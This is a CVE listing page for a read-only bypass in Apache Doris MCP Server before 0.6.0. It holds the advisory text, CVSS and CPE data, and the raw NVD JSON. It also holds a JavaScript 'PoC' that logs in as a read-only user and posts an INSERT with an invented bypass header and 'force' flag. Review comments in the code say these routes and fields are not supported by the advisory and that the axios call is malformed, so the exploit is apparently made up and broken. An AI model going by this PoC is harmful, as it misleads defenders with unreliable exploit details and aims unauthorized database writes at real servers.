Security Vulnerability Report
CVE-2025-58337 CVSS 5.4 MEDIUM

CVE-2025-58337

Published: 2025-11-05 10:15:36
Last Modified: 2025-11-12 20:51:19

Description

An attacker with a valid read-only account can bypass Doris MCP Server’s read-only mode due to improper access control, allowing modifications that should have been prevented by read-only restrictions. Impact: Bypasses read-only mode; attackers with read-only access may perform unauthorized modifications. Recommended action for operators: Upgrade to version 0.6.0 as soon as possible (this release contains the fix).

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:doris_mcp_server:*:*:*:*:*:*:*:* - VULNERABLE
Apache Doris MCP Server < 0.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-58337 PoC - Doris MCP Server Read-Only Bypass
// Requires valid read-only account credentials
//
// NOTE(review): the advisory text on this page describes the flaw only as
// "improper access control" in read-only mode. It names no route, header or
// request field. The /api/auth/login, /api/query and /api/execute paths, the
// X-Bypass-Mode header and the `force` flag used below are this listing's own
// and are not corroborated by anything else on the page; do not build
// detection signatures or affected/not-affected checks on them.
// What the page does support: versions before 0.6.0 are affected and the fix
// is to upgrade to 0.6.0. A deployment check that follows from the description
// is that write statements issued under a read-only account are rejected, and
// that database audit logs show no writes attributed to such accounts.
const axios = require('axios');

class DorisMCPExploit {
  /**
   * @param {string} baseUrl  Base URL that the request paths are appended to.
   * @param {string} username Account name sent to the login route.
   * @param {string} password Password sent to the login route.
   */
  constructor(baseUrl, username, password) {
    Object.assign(this, { baseUrl, username, password, token: null });
  }

  /**
   * Posts the stored credentials with mode 'read-only' and keeps the `token`
   * field of the response body on the instance.
   *
   * @returns {Promise<*>} The stored token (whatever `response.data.token` held).
   */
  async authenticate() {
    // Authenticate with read-only account
    const credentials = {
      username: this.username,
      password: this.password,
      mode: 'read-only',
    };
    const { data } = await axios.post(`${this.baseUrl}/api/auth/login`, credentials);
    this.token = data.token;
    return this.token;
  }

  /**
   * Issues one GET and then one POST, logging each response body.
   *
   * @returns {Promise<boolean>} true when both requests resolve, false when
   *   either one throws (the error message is logged, not rethrown).
   */
  async exploitBypass() {
    // This PoC demonstrates the vulnerability principle
    try {
      // Normal read operation (should work)
      const readResult = await axios.get(`${this.baseUrl}/api/query`, {
        headers: { 'Authorization': `Bearer ${this.token}` },
        params: { sql: 'SELECT * FROM users LIMIT 10' },
      });
      console.log('Read operation successful:', readResult.data);

      // Write attempt that the listing presents as the bypass.
      // NOTE(review): axios.post takes (url, body, config). The object below is
      // the second argument, so `headers` and `data` are serialized as fields
      // of the request body and no Authorization header is set on this call.
      // A success or failure here therefore says nothing reliable about
      // whether a given server enforces read-only mode.
      const writePayload = {
        headers: {
          'Authorization': `Bearer ${this.token}`,
          'X-Bypass-Mode': 'override',
        },
        data: {
          sql: 'INSERT INTO sensitive_data VALUES (1, "exploit")',
          force: true,
        },
      };
      const writeResult = await axios.post(`${this.baseUrl}/api/execute`, writePayload);
      console.log('Write operation (bypassed):', writeResult.data);
      return true;
    } catch (error) {
      console.error('Exploitation failed:', error.message);
      return false;
    }
  }
}

// Usage example
// A rejected authenticate() is not handled here and surfaces as an unhandled
// rejection; the promise returned by exploitBypass() is deliberately not awaited.
const exploit = new DorisMCPExploit(
  'https://target-doris-server:5000',
  'readonly_user',
  'password123',
);

exploit.authenticate().then(() => void exploit.exploitBypass());

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58337", "sourceIdentifier": "[email protected]", "published": "2025-11-05T10:15:36.483", "lastModified": "2025-11-12T20:51:18.687", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An attacker with a valid read-only account can bypass Doris MCP Server’s read-only mode due to improper access control, allowing modifications that should have been prevented by read-only restrictions.\n\n\nImpact:\n\nBypasses read-only mode; attackers with read-only access may perform unauthorized modifications.\n\n\n\n\nRecommended action for operators: Upgrade to version 0.6.0 as soon as possible (this release contains the fix)."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:doris_mcp_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.6.0", "matchCriteriaId": "83AE2DD9-0162-4B19-B585-600A5C98F1CB"}]}]}], "references": [{"url": "https://lists.apache.org/thread/6tswlphj0pqn9zf25594r3c1vzvfj40h", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/11/04/5", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", 
"Third Party Advisory"]}]}}